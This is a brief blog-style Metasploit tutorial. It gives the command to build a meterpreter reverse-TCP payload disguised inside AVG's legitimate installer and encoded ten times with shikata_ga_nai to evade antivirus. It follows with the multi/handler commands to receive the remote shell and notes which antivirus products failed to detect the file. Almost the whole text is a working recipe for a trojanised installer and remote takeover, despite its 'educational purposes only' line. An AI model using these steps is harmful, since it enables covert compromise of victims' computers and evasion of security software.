Metasploit Tutorial 1

This tutorial is for educational purposes only.  I know there are a lot of good tutorials out there but I am creating my own as a quick reference. and have some great video tutorials.  This is just a quick reference using meterpreter.


windows/meterpreter/reverse_tcp LHOST= LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe


Here I took avg's vaild installer file and use its characteristics into evillfile.exe.  I also encoded it 10 times using shikata_ga_nai.    You take evilfile.exe and place on the target machine.


Kick off metasploit and type


# use multi/handler
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LHOST
# set LPORT 8888
# exploit


run your file on the target machine.


Also by using avg characteristics and encoding 10 times only Sophos and DrWeb caught that this was really malware.  When I encoded the payload of windows/shell/reverse_tcp Windows Security Essentials and Sophos caught that.  What's up with the main virus players - Symantec, McAfee, and Trend all thought the file was good.